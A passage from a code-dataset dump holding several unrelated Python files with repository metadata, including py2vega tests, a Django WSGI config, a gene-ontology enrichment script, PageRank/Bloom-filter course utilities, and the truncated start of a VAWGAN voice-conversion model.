TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from sqlalchemy import Column, Integer, String, Boolean, DateTime
from programy.storage.stores.sql.base import Base
from programy.storage.stores.utils import DAOUtils
class Link(Base):
__tablename__ = 'links'
id = Column(Integer, primary_key=True)
primary_user = Column(String(16))
generated_key = Column(String(256))
provided_key = Column(String(256))
expired = Column(Boolean)
expires = Column(DateTime)
retry_count = Column(Integer)
def __repr__(self):
return "<Linked(id='%s', primary_user='%s', provided_key='%s', generated_key='%s', expired='%s', expires='%s', retry_count='%d')>" % \
(DAOUtils.valid_id(self.id), self.primary_user, self.provided_key, self.generated_key, self.expired, self.expires, self.retry_count)
| [
"cliff@cotobadesign.com"
] | cliff@cotobadesign.com |
e7e44f6c501f1455b389ef57e85fc9f635efc6a2 | b0ddd37a614556785b2ecd3d408357fd010ed72f | /test/test_py2vega.py | 61017752de6e06bfb281d05b43ba4bed2c5c5854 | [
"BSD-3-Clause"
] | permissive | codeaudit/py2vega | 837c9b347f4968956656fcfbc15b2d69110e267f | a3a94bf7e29414a649b796e3202a5621befadbb3 | refs/heads/master | 2020-07-07T13:06:04.690110 | 2019-08-20T08:49:12 | 2019-08-20T08:49:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,294 | py | import pytest
from py2vega import py2vega
from py2vega.functions.math import isNaN
whitelist = ['value', 'x', 'y', 'height', 'width', 'row', 'column']
def test_nameconstant():
code = 'False'
assert py2vega(code, whitelist) == 'false'
code = 'True'
assert py2vega(code, whitelist) == 'true'
code = 'None'
assert py2vega(code, whitelist) == 'null'
def test_num():
code = '36'
assert py2vega(code, whitelist) == '36'
def test_str():
code = '\'white\''
assert py2vega(code, whitelist) == '\'white\''
def test_tuple():
code = '(True, 3, \'hello\')'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
code = '((True, 3, \'hello\'), 3)'
assert py2vega(code, whitelist) == '[[true, 3, \'hello\'], 3]'
def test_list():
code = '[True, 3, \'hello\']'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
def test_dict():
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
def test_unary():
code = 'not value'
assert py2vega(code, whitelist) == '!(value)'
code = '-value'
assert py2vega(code, whitelist) == '-value'
code = '+value'
assert py2vega(code, whitelist) == '+value'
def test_binary():
code = 'value or 3'
assert py2vega(code, whitelist) == 'value || 3'
code = 'value and 3'
assert py2vega(code, whitelist) == 'value && 3'
code = 'value + 3'
assert py2vega(code, whitelist) == 'value + 3'
code = 'value**3'
assert py2vega(code, whitelist) == 'pow(value, 3)'
def test_ternary():
code = '3 if value else 4'
assert py2vega(code, whitelist) == 'value ? 3 : 4'
def test_compare():
code = '3 < value <= 4'
assert py2vega(code, whitelist) == '3 < value <= 4'
code = 'value in (\'ford\', \'chevrolet\')'
assert py2vega(code, whitelist) == 'indexof([\'ford\', \'chevrolet\'], value) != -1'
code = '\'chevrolet\' in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') != -1'
code = '\'chevrolet\' not in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') == -1'
def foo(value):
return 'red' if value < 150 else 'green'
def test_function():
assert py2vega(foo, whitelist) == 'value < 150 ? \'red\' : \'green\''
def test_whitelist():
with pytest.raises(NameError):
py2vega('my_variable')
assert py2vega('my_variable', ['my_variable']) == 'my_variable'
# Vega constants are accessible by default
assert py2vega('PI') == 'PI'
def bar():
return isNaN(3)
def test_math():
assert py2vega(bar) == 'isNaN(3)'
def invalid_func1():
print(3)
def test_invalid1():
with pytest.raises(RuntimeError):
py2vega(invalid_func1)
def test_invalid2():
with pytest.raises(RuntimeError):
py2vega(lambda value: value)
def conditional_func(value):
if value < 3:
return 'red'
elif value < 5:
return 'green'
else:
return 'yellow'
def test_if_stmt():
assert py2vega(conditional_func, whitelist) == "if(value < 3, 'red', if(value < 5, 'green', 'yellow'))"
def assign_func1(value):
val = ('USA', 'Japan')
return 'red' if value in val else 'green'
def assign_func2(value):
a = 'green'
b = 'red'
return a if value < 3 else b
def assign_func3(value):
a = 'green'
a = 'red'
return a
def assign_func4(value):
a = 'green'
b = a
return b
def assign_func5(value):
a = b = 'Hello'
return (a, b)
def assign_func6(value):
a = 'Hello'
b = a
a = 'World'
return b
def test_assign1():
assert py2vega(assign_func1, whitelist) == "indexof(['USA', 'Japan'], value) != -1 ? 'red' : 'green'"
def test_assign2():
assert py2vega(assign_func2, whitelist) == "value < 3 ? 'green' : 'red'"
def test_assign3():
assert py2vega(assign_func3, whitelist) == "'red'"
def test_assign4():
assert py2vega(assign_func4, whitelist) == "'green'"
def test_assign5():
assert py2vega(assign_func5, whitelist) == "['Hello', 'Hello']"
def test_assign6():
assert py2vega(assign_func6, whitelist) == "'Hello'"
| [
"martin.renou@gmail.com"
] | martin.renou@gmail.com |
4152c23801374c7f6045a744aabcf125ba1213af | 4d2942cb8b7a6c15c1d09c36e4a881cd8d54b981 | /이분탐색/3020_개똥벌레_누적합.py | 54981889f353f99283bfff385ea981ccacc51ea8 | [] | no_license | Novicett/codingtest_with_python | 4ebbceedce42ea5c27bebbacaec0046a7fc7cce8 | 9cfb1a1be81acd69bf73d2f3698145c74e305dc0 | refs/heads/master | 2023-05-30T02:03:08.620929 | 2021-06-20T03:22:24 | 2021-06-20T03:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | import sys
input = sys.stdin.readline
N, H = map(int, input().split())
#구간 i에서
bottom = [0]*(H+1) #석순 -> 길이 i 이상면 부셔야함
top = [0]*(H+1) #종유석 -> 길이 N-i 이상이면 부셔야함
for _ in range(N//2):
b = int(input().strip())
bottom[b] += 1
t = int(input().strip())
top[t] += 1
# stone[i]: obstacles destroyed when flying at height i
# (stalagmites of length >= i plus stalactites of length >= H-i+1)
stone = [0]*(H+1)
for i in range(1, H+1):
    stone[i] = sum(bottom[i:]) + sum(top[H-i+1:])
answer = min(stone[1:])
print(answer, stone[1:].count(answer)) | [
"viliketh1s98@naver.com"
] | viliketh1s98@naver.com |
c85ea979fa55726808cbb173ae8c5e57cd2b6165 | 5536ef87d7d10ab01befb85a34d6fb5bfddde49f | /weed/wsgi.py | 8d293b07852294fa53887d3952396dd811f0b5a3 | [] | no_license | ViriAldi/DB_project_weed_app | 987a5db0fc175c67312d27949266505ab5ede05e | 620e503b0d33844ef9832902cf5c104abf967266 | refs/heads/master | 2023-05-08T13:06:08.302939 | 2021-05-30T21:48:30 | 2021-05-30T21:48:30 | 372,316,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
WSGI config for weed project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'weed.settings')
application = get_wsgi_application()
| [
"v.fedynyak@ucu.edu.ua"
] | v.fedynyak@ucu.edu.ua |
d771baddfaa09a4c3db22756b3f490f38382cbf3 | afada51a34ebc932fc9ca824ecf56aae04e3d74b | /lib/enrichment_modules.py | b74c4fce6db72594a14b0b79acb4fe6ac996284c | [] | no_license | SkBlaz/CBSSD | 0ec8c7e3fc2765d4897b650f584e97afabf7c4f6 | 3043a76c7065fa0f13770f38d3b7b3f661a9f117 | refs/heads/master | 2021-01-01T19:53:21.190536 | 2019-02-01T06:31:23 | 2019-02-01T06:31:23 | 98,710,089 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,931 | py | ##### this pyton code enables enrichment calculation from graph results from previous step
## this is to calculate enrichment scores
from scipy.stats import fisher_exact
import multiprocessing as mp
import random
from statsmodels.sandbox.stats.multicomp import multipletests
from collections import defaultdict, Counter
from .parsers import parse_gaf_file,read_termlist,read_topology_mappings,read_uniprot_GO
import pandas as pd
def calculate_pval(term):
    # uses module-level globals set by compute_enrichment: _partition_name, _partition_entries, _map_term_database, _number_of_all_annotated
    ## Fisher's exact test p-value: is the query term over-represented in the current partition relative to the annotated population?
#print(component, term_dataset, term, count_all)
query_term = term[0]
query_term_count_population = term[1]
inside_local = 0
outside_local = 0
for x in _partition_entries:
terms = _map_term_database[x]
if query_term in terms:
inside_local+=1
else:
outside_local+=1
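    # 2x2 contingency table for Fisher's exact test: term occurrences inside
    # the partition vs. in the whole annotated population.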
query_counts = [inside_local, query_term_count_population]
pop_counts = [outside_local, _number_of_all_annotated-query_term_count_population]
p_value = fisher_exact([query_counts,pop_counts])[1]
return p_value
def multiple_test_correction(input_dataset):
from statsmodels.sandbox.stats.multicomp import multipletests
pvals = defaultdict(list)
with open(input_dataset) as ods:
for line in ods:
try:
component, term, pval = line.split()
pvals[component].append((term,pval))
except:
pass
print ("Component_by_size PFAM_term pvalue")
for key, values in pvals.items():
tmpP = [float(val[1]) for val in values]
termN = [val[0] for val in values]
significant, pvals, sidak, bonf = multipletests(tmpP,method="hs",is_sorted=False,returnsorted=False)
## Holm Sidak
output = zip(termN,significant,pvals,tmpP)
for term,significant,pval,tmp in output:
if (significant == True):
print (key,term,significant,tmp,pval)
def parallel_enrichment(term):
pval = calculate_pval(_term_database[term])
return {'observation' : _partition_name,'term' : _term_database[term][0],'pval' : pval}
def compute_enrichment(term_dataset, term_database, topology_map, all_counts, whole_term_list=False):
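    # For every topology partition, test each annotation term for enrichment and
    # keep only the hits that remain significant after Benjamini-Hochberg FDR correction.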
if whole_term_list:
tvals = set.union(*[x for x in topology_map.values()])
topology_map = {}
topology_map['1_community'] = tvals
global _partition_name
global _partition_entries
global _term_database
global _map_term_database
global _number_of_all_annotated
_number_of_all_annotated = all_counts
_term_database = {en : x for en, x in enumerate(term_database.items())} ## database of all annotations
_map_term_database = term_dataset ## entry to acc mappings
finalFrame = pd.DataFrame()
for k, v in topology_map.items():
print("Computing enrichment for partition {}".format(k))
## reassign for parallel usage
_partition_name = k
_partition_entries = v
        ## computational pool instantiation (the pool.map path below is commented out,
        ## so avoid spawning workers that would never be used or closed)
        ncpu = 2  # mp.cpu_count()
        # pool = mp.Pool(ncpu)
## compute the results
n = len(term_database)
step = ncpu ## number of parallel processes
jobs = [range(n)[i:i + step] for i in range(0, n, step)] ## generate jobs
## result container
tmpframe = pd.DataFrame(columns=['observation','term','pval'])
results = [parallel_enrichment(x) for x in range(n)]
# for batch in jobs:
# results = pool.map(parallel_enrichment,batch)
tmpframe = tmpframe.append(results,ignore_index=True)
## multitest corrections on partition level
significant, p_adjusted, sidak, bonf = multipletests(tmpframe['pval'],method="fdr_bh",is_sorted=False, returnsorted=False, alpha=0.05)
tmpframe['corrected_pval_fdr_bh'] = pd.Series(p_adjusted)
tmpframe['significant'] = pd.Series(significant)
tmpframe = tmpframe[tmpframe['significant'] == True]
finalFrame = finalFrame.append(tmpframe,ignore_index=True)
return finalFrame
if __name__ == "__main__":
print("Starting enrichment analysis..")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--filename",default="./test.txt")
parser.add_argument("--filename_mappings",default="./test.txt")
args = parser.parse_args()
## 1.) read the database.
term_dataset, term_database, all_counts = read_uniprot_GO(args.filename)
## 2.) partition function dict.
topology_map = read_topology_mappings(args.filename_mappings)
## 3.) calculate p-vals.
significant_results = compute_enrichment(term_dataset, term_database, topology_map, all_counts,whole_term_list=False)
significant_results.to_csv("../example_outputs/term_examples.txt",sep=" ",header=False)
| [
"skrljblaz@gmail.com"
] | skrljblaz@gmail.com |
704c901c0beb1e642138f31847e55b736bb16ce0 | 6925af8f5c640faf84189953f263ab60b713919e | /Lab2/main.py | 16467a46a6bb1a4bc4fae87eda0783082508a962 | [] | no_license | vvvmvvv/DATABASE_KPI | 0e334df6068dc6dbdbecd58d6b39e0b5046246e3 | ee12346616b45f2cb3c629553bc316275a87c290 | refs/heads/master | 2020-09-29T18:21:24.884257 | 2019-12-11T01:35:01 | 2019-12-11T01:35:01 | 227,092,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,641 | py | import npyscreen
from dbManager import FootballDatabase
from forms.FindPlayer import FindPlayer
from forms.EditTournament import EditTournament
from forms.EditClub import EditClub
from forms.ClubsList import ClubsListDisplay
from forms.EditPlayer import EditPlayer
from forms.EntityList import EntityListDisplay
from forms.FullTextSearch import FullTextSearch
from forms.PlayersList import PlayersListDisplay
from forms.TournamentsList import TournamentsListDisplay
class FootballDBApplication(npyscreen.NPSAppManaged):
def onStart(self):
self.database = FootballDatabase()
self.database.connect()
self.database.exec_script_file('dropTables.sql')
self.database.exec_script_file('createTables.sql')
self.database.generate_random_clubs()
self.database.generate_random_players()
self.database.generate_random_tournaments()
self.addForm("MAIN", EntityListDisplay)
self.addForm("PLAYERSLIST", PlayersListDisplay)
self.addForm("EDITPLAYER", EditPlayer)
self.addForm("CLUBSLIST", ClubsListDisplay)
self.addForm("EDITCLUB", EditClub)
self.addForm("TOURNAMENTSLIST", TournamentsListDisplay)
self.addForm("EDITTOURNAMENT", EditTournament)
self.addForm("ADVANCEDSEARCH", FindPlayer)
self.addForm("TEXTSEARCH", FullTextSearch)
def onCleanExit(self):
self.database.close_connection()
if __name__ == '__main__':
myApp = FootballDBApplication()
print("Lab 2 by Vladimir Mikulin KP-71")
print('----------------------------------------')
print('Thank you for watching!!!!')
myApp.run()
| [
"boxingvm16@gmail.com"
] | boxingvm16@gmail.com |
fecf3c9497776515f270c2dd69738bea837cb34a | d466c19878c629d46c535f6613e0a051430aa8bd | /datasets.py | dffa9c9c35a6efc46b06adf372bd3c2122fbcde8 | [
"MIT"
] | permissive | nnuq/tpu | 3949929ad2e3eebd6ab703b3181c1dba1661f93d | cec2f34c07333dd43adf69a168ae82f5296a260b | refs/heads/master | 2023-07-20T04:28:48.753543 | 2020-05-26T13:49:29 | 2020-05-26T13:49:29 | 267,009,922 | 0 | 0 | MIT | 2023-07-06T21:27:44 | 2020-05-26T10:12:49 | Python | UTF-8 | Python | false | false | 1,221 | py | # -*- coding: utf-8 -*-
# @Date : 2019-07-25
# @Author : Xinyu Gong (xy_gong@tamu.edu)
# @Link : None
# @Version : 0.0
import torch
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from torch.utils.data import Dataset
class ImageDataset(object):
def __init__(self, args, cur_img_size=None):
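        """Build CIFAR-10 train/valid DataLoaders, resizing images to the requested size."""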
img_size = cur_img_size if cur_img_size else args.img_size
if args.dataset.lower() == 'cifar10':
Dt = datasets.CIFAR10
transform = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor()
])
else:
raise NotImplementedError('Unknown dataset: {}'.format(args.dataset))
self.train = torch.utils.data.DataLoader(
Dt(root=args.data_path, train=True, transform=transform, download=True),
batch_size=args.train_batch_size, shuffle=True,
num_workers=args.num_workers, pin_memory=True)
self.valid = torch.utils.data.DataLoader(
Dt(root=args.data_path, train=False, transform=transform),
batch_size=args.eval_batch_size, shuffle=False,
num_workers=args.num_workers, pin_memory=True) | [
"rmermin@yahoo.com"
] | rmermin@yahoo.com |
ad2593ec004110646224f27a2a526b0362b394d7 | 93823cd2d697be367c08d0d8ec7644c2f4a6ab0d | /cuticulus/__init__.py | ce2e9369433af0ab344983d877a3cdb5fd14edf1 | [
"MIT"
] | permissive | CMVSR/cuticulus | d15f5ae6c74ad6f4939ea72b066b37c03db4a6e7 | fd8f3108f5c5547ed56a902cc8d058eedd216908 | refs/heads/main | 2023-05-28T01:54:24.159823 | 2022-10-13T22:53:19 | 2022-10-13T22:53:19 | 376,367,066 | 0 | 0 | MIT | 2022-09-23T15:24:32 | 2021-06-12T19:14:28 | Jupyter Notebook | UTF-8 | Python | false | false | 42 | py | """Main module and exported functions."""
| [
"ngngardner@gmail.com"
] | ngngardner@gmail.com |
83dc48d096fb5a7bbac051cd9371739900fe57a9 | 72efaf7ee46ae000773a7c09437b9be3ca223552 | /pluralization.py | 2baeedc39d505e1760947971608b189d703e78c0 | [] | no_license | Frifon/CS_MSU_203_bot | 962bb8ac6be0d530f2cf0cf670daf9a258828910 | 76ed63e0baf334ab349985a4ed5864bac7b573bc | refs/heads/master | 2021-01-16T19:40:17.179924 | 2015-09-09T08:39:29 | 2015-09-09T08:39:29 | 42,131,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | def s1(x):
if 11 <= x % 100 <= 19 or 5 <= x % 10 <= 9 or x % 10 == 0:
return "ов"
elif 2 <= x % 10 <= 4:
return "а"
else:
return ""
def s2(x):
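    # Same 11-19 / 2-4 / default split as s1, but returning the endings "", "ы" and "а".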
if 11 <= x % 100 <= 19 or 5 <= x % 10 <= 9 or x % 10 == 0:
return ""
elif 2 <= x % 10 <= 4:
return "ы"
else:
return "а"
| [
"kkrugl@yandex.ru"
] | kkrugl@yandex.ru |
e00ae3abefa88548226195bed1c30c7e690537d8 | 5fa5c07da210b72891b733359b37630bada126a0 | /GA_ProjectUtils.py | 056b77f4bfee30e7b3cb0914a7fc6fdb028b1f53 | [] | no_license | max-kazak/PageRank | 6f82b532a07c4955248e19e3537109987e6d4265 | 190b017b286a63abf4006a7a78342acfab3d62a4 | refs/heads/master | 2020-09-09T02:44:33.148309 | 2019-11-12T22:09:19 | 2019-11-12T22:09:19 | 221,321,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,146 | py | # -*- coding: utf-8 -*-
"""
Utility functions - do not modify these functions! Some of these functions may not be applicable to your project. Ignore them
If you find errors post to class piazza page.
"""
#import time
#import os
#useful structure to build dictionaries of lists
#from collections import defaultdict
########################################
#IO and Util functions
#returns sorted version of l, and idx order of sort
def getSortResIDXs(l, rev=True):
from operator import itemgetter
return zip(*sorted([(i,e) for i,e in enumerate(l)],
key=itemgetter(1),reverse=rev))
#read srcFile into list of ints
def readIntFileDat(srcFile):
strs = readFileDat(srcFile)
res = [int(s.strip()) for s in strs]
return res
#read srcFile into list of floats
def readFloatFileDat(srcFile):
strs = readFileDat(srcFile)
res = [float(s.strip()) for s in strs]
return res
#read srcFile into list of strings
def readFileDat(srcFile):
import os
try:
f = open(srcFile, 'r')
except IOError:
#file doesn't exist, return empty list
print('Note : {} does not exist in current dir : {}'.format(srcFile, os.getcwd()))
return []
src_lines = f.readlines()
f.close()
return src_lines
#write datList into fName file
def writeFileDat(fName, datList):
f = open(fName, 'w')
for item in datList:
print>>f, item
f.close()
#append record to existing file
def appendFileDat(fName, dat):
f = open(fName, 'a+')
print>>f, dat
f.close()
########################################
#Bloom Filter Project functions
#this will compare the contents of the resList with the data in baseFile
#and display performance
def compareResults(resList, configData):
baseFileName = configData['valFileName']
baseRes = readFileDat(baseFileName)
if(len(baseRes) != len(resList) ):
print('compareFiles : Failure : Attempting to compare different size lists')
return None
numFail = 0
numFTrueRes = 0
numFFalseRes = 0
for i in range(len(resList)):
if (resList[i].strip().lower() != baseRes[i].strip().lower()):
resVal = resList[i].strip().lower()
baseResVal = baseRes[i].strip().lower()
#uncomment this to see inconsistencies
#print('i : ' + str(i) + ': reslist : ' + resVal + ' | baseres : ' + baseResVal)
numFail += 1
if resVal == 'true' :
numFTrueRes += 1
else :
numFFalseRes += 1
if(numFail == 0):
print('compareResults : Your bloom filter performs as expected')
else:
print('compareResults : Number of mismatches in bloomfilter compared to validation file : ' + str(numFail) + '| # of incorrect true results : ' + str(numFTrueRes) + '| # of incorrect False results : ' + str(numFFalseRes))
if((configData['studentName'] != '') and (configData['autograde'] == 2)):
gradeRes = configData['studentName'] + ', ' + str(numFail) + ', ' + str(numFTrueRes) + ', ' + str(numFFalseRes)
print('saving results for ' + gradeRes + ' to autogradeResult.txt')
appendFileDat('autogradeResult.txt', gradeRes)
#this will process input configuration and return a dictionary holding the relevant info
def buildBFConfigStruct(args):
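    # Parse the bloom-filter config file plus CLI args into one dict:
    # hash type and seeds, numeric parameters, file names and autograde flags.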
import time
bfConfigData = readFileDat(args.configFileName)
configData = dict()
for line in bfConfigData:
#build dictionary on non-list elements
if (line[0]=='#') or ('_' in line):
continue
elems = line.split('=')
if('name' in elems[0]):
configData[elems[0]]=elems[1].strip()
else :
configData[elems[0]]=int(elems[1])
if ('Type 1' in configData['name']):
configData['type'] = 1
configData['seeds'] = buildSeedList(bfConfigData, int(configData['k']))
elif ('Type 2' in configData['name']):
configData['type'] = 2
aListData = []
bListData = []
listToAppend = aListData
for line in bfConfigData:
if (line[0]=='#'):
if ('b() seeds' in line):
listToAppend = bListData
continue
listToAppend.append(line)
configData['a']= buildSeedList(aListData, int(configData['k']))
configData['b']= buildSeedList(bListData, int(configData['k']))
else :
configData['type'] = -1
print('unknown hash function specified in config file')
configData['task'] = int(args.taskToDo)
if configData['task'] != 2 :
configData['genSeed'] = int(time.time()*1000.0) & 0x7FFFFFFF #(int)(tOffLong & 0x7FFFFFFF);
print('Random Time Seed is : ' + str(configData['genSeed']))
configData['inFileName'] = args.inFileName
configData['outFileName'] = args.outFileName
configData['configFileName'] = args.configFileName
configData['valFileName'] = args.valFileName
configData['studentName'] = args.studentName
configData['autograde'] = int(args.autograde)
for k,v in configData.iteritems():
print('Key = ' + k + ': Val = '),
print(v)
return configData
def buildSeedList(stringList, k):
res = [0 for x in range(k)]
for line in stringList:
if ('_' not in line) or (line[0]=='#'):
continue
elems = line.split('=')
araElems = elems[0].split('_')
res[int(araElems[1])]=int(elems[1])
return res
"""
Function provided for convenience, to find next prime value from passed value
Use this to find an appropriate prime size for type 2 hashes.
Finds next prime value larger than n via brute force. Checks subsequent numbers
until prime is found - should be much less than 160 checks for any values
seen in this project since largest gap g between two primes for any 32 bit
signed int is going to be g < 336, and only have to check at most every
other value in gap. For more, see this article :
https://en.wikipedia.org/wiki/Prime_gap
n : some value
return next largest prime
"""
def findNextPrime(n):
if (n==2) :
return 2
if (n%2==0):
n+=1
#n is odd here; 336 is larger than largest gap between 2 consequtive 32 bit primes
for i in range (n,(n + 336), 2):
if checkIfPrime(i):
return i
#error no prime found returns -1
return -1
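# e.g. findNextPrime(32) -> 37, findNextPrime(97) -> 97 (n itself is returned when n is already prime)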
"""
check if value is prime, return true/false
n value to check
"""
def checkIfPrime(n):
if (n < 2) : return False
if (n < 4) : return True
if ((n % 2 == 0) or (n % 3 == 0)): return False
sqrtN = n**(.5)
i = 5
w = 2
while (i <= sqrtN):
if (n % i == 0): return False
i += w
#addresses mod2 and mod3 above, flip flops between looking ahead 2 and 4 (every other odd is divisible by 3)
w = 6-w
return True
## end bloom filter functions
######################################
########################################
#Page Rank Functions
#get file values for particular object and alpha value
#results are list of nodes, list of rank values and dictionary matching node to rank value
#list of nodes and list of rank values are sorted
def getResForPlots(prObj, alpha):
outFileName = makeResOutFileName(prObj.inFileName, alpha, prObj.sinkHandling)
vNodeIDs_unsr, vRankVec_unsr = loadRankVectorData(outFileName, isTest=False)
#build dictionary that links node id to rank value
vNodeDict = buildValidationDict(vNodeIDs_unsr,vRankVec_unsr)
#build sorted list
vNodeIDs, vRankVec = getSortResIDXs(vRankVec_unsr)
return vNodeIDs, vRankVec, vNodeDict
#build appropriate results file name based on passed input name, alpha and sink handling flag
def makeResOutFileName(inFileName,alpha,sinkHandling):
nameList = inFileName.strip().split('.')
namePrefix = '.'.join(nameList[:-1])
#build base output file name based on input file name and whether or not using selfloops to handle sinks
outFileName = "{}_{}_{}.{}".format(namePrefix,("SL" if sinkHandling==0 else "T3"), alpha,nameList[-1])
return outFileName
#builds output file names given passed file name
def buildPROutFNames(fName, getVerifyNames=False):
#construct ouput file names based on fName (which is input file name : i.e. 'inputstuff.txt')
nameList = fName.strip().split('.')
#name without extension
namePrefix = '.'.join(nameList[:-1])
if getVerifyNames :
#get names for verification files
#file holding rank vector values
voutFName = '{}-{}.{}'.format(namePrefix, 'verifyRVec',nameList[-1])
return voutFName
else :
#names for saving results or accessing saved results
#file holding rank vector values
outFName = '{}-{}.{}'.format(namePrefix, 'outputPR',nameList[-1])
return outFName
#this will build a dictionary with :
# keys == graph nodes and
# values == list of pages accessible from key
# and will also return a list of all node ids
# using terminology from lecture, this builds the "out list" for each node in
# file, and a list of all node ids
def loadGraphADJList(fName):
from collections import defaultdict
#defaultDict has 0/empty list entry for non-present keys,
#does not return invalid key error
resDict = defaultdict(list)
filedat = readFileDat(fName)
allNodesSet = set()
#each line has a single number, followed by a colon, followed by a list of
#1 or more numbers spearated by commas
#these represent node x : reachable nodes from node x
for line in filedat:
vals = line.strip().split(':')
adjValStrs = vals[1].strip().split(',')
#convert list of strings to list of ints
adjVals = [int(s.strip()) for s in adjValStrs]
key = int(vals[0].strip())
allNodesSet.add(key)
allNodesSet.update(adjVals)
resDict[key] = adjVals
return resDict, list(allNodesSet)
#given the base input file name
#this will return a list of nodes in order of rank (if rankName file exists)
#and a vector of rank values as floats (if outputName file exists)
#using either base file extensions or the verification file names
def loadRankVectorData(fName, isTest=False):
outFName = buildPROutFNames(fName, isTest)
#read rank vector as list of floats, expected to be in order of node ids
rankVec = readFloatFileDat(outFName)
rankedIDS = list(xrange(len(rankVec)))
#either output, or both, might be empty list(s) if files don't exist
return rankedIDS, rankVec
#will save a list of nodes in order of rank, and rank values (the rank vector) for those nodes in same order
#in two separate files
def saveRankData(fName, rankVec=None):
outFName = buildPROutFNames(fName)
if(rankVec != None):
writeFileDat(outFName, rankVec)
print('Rank vector saved to file {}'.format(outFName))
#build a dictionary that will have node id as key and rank vector value as value - used for verification since equal rank vector values might be in different order
def buildValidationDict(nodeIDs, rankVec):
vDict = {}
for x in xrange(len(nodeIDs)):
vDict[nodeIDs[x]] = rankVec[x]
return vDict
"""
using provided output file, verify calculated page rank is the same as expected results
args used for autograder version
"""
def verifyResults(prObj, args=None, eps=.00001):
print('\nVerifying results for input file "{}" using alpha={} and {} sink handling :\n'.format(prObj.inFileName, prObj.alpha, ('self loop' if prObj.sinkHandling==0 else 'type 3')))
#load derived values from run of page rank
calcNodeIDs,calcRankVec = loadRankVectorData(prObj.outFileName, isTest=False)
#load verification data
vNodeIDs, vRankVec = loadRankVectorData(prObj.outFileName, isTest=True)
if (len(vNodeIDs) == 0) or (len(vRankVec)==0) :
print ('Validation data not found, cannot test results')
return False
#compare nodeID order
if(len(calcNodeIDs) != len(vNodeIDs)) :
print('!!!! Error : incorrect # of nodes in calculated page rank - yours has {}; validation has {}'.format(len(calcNodeIDs),len(vNodeIDs)))
return False
print('Calculated Rank vector is of appropriate length')
#need to verify that rank vector sums to 1
cRVecSum = sum(calcRankVec)
if abs(cRVecSum - 1) > eps :
print('!!!! Error : your calculated rank vector values do not sum to 1.0 : {} '.format(cRVecSum))
return False
print('Calculated Rank vector has appropriate magnitude of 1.0')
#build dictionary of validation data and test data - doing this because order might be different for nodes with same rank value
validDict = buildValidationDict(vNodeIDs,vRankVec)
calcDict = buildValidationDict(calcNodeIDs,calcRankVec)
#compare if matched - Note nodes with same rank value vector value might be out of order
for x in xrange(len(vNodeIDs)):
if abs(calcDict[vNodeIDs[x]] - validDict[vNodeIDs[x]]) > eps :
print('!!!! Error : rank vector values do not match, starting at idx {}, node {}, in validation node id list'.format(x,vNodeIDs[x]))
return False
print('Rank Vector values match verification vector values')
return True
#autograder code
def autogradePR(prObj, args, prMadeTime):
print('Running autograder on {} for prObj with input file {}'.format(args.studentName, prObj.inFileName))
#End Page Rank Functions
########################################
| [
"mk@Maxims-MacBook-Pro.local"
] | mk@Maxims-MacBook-Pro.local |
c26da058b911281e11464c3b69cd511474dda0e1 | eb1fcb86fe1f8e1738085a152407abb57280eaad | /hw2/hw2-3/model/vaegan.py | a01eafafeb77599780396c24bd2a5da64ceedfdb | [
"BSD-3-Clause"
] | permissive | getinglxf/DLHLP2020-SPRING | e813946f937863e693913ef3d664c45b23a1b17e | d336c8bfa2b28c6817f1899a89ab5c6b12fe059f | refs/heads/master | 2022-11-06T20:56:34.204010 | 2020-06-23T08:21:52 | 2020-06-23T08:21:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,869 | py | import pdb
import tensorflow as tf
from tensorflow.contrib import slim
from util.layer import GaussianLogDensity, GaussianKLD, \
GaussianSampleLayer, lrelu
class VAWGAN(object):
'''
VC-GAN
= CVAE-CGAN
= Convolutional Variational Auto-encoder
with Conditional Generative Adversarial Net
'''
def __init__(self, arch, is_training=False):
self.arch = arch
self._sanity_check()
self.is_training = is_training
with tf.name_scope('SpeakerRepr'):
self.y_emb = self._unit_embedding(
self.arch['y_dim'],
self.arch['z_dim'],
'y_embedding')
self._generate = tf.make_template(
'Generator',
self._generator)
self._discriminate = tf.make_template(
'Discriminator',
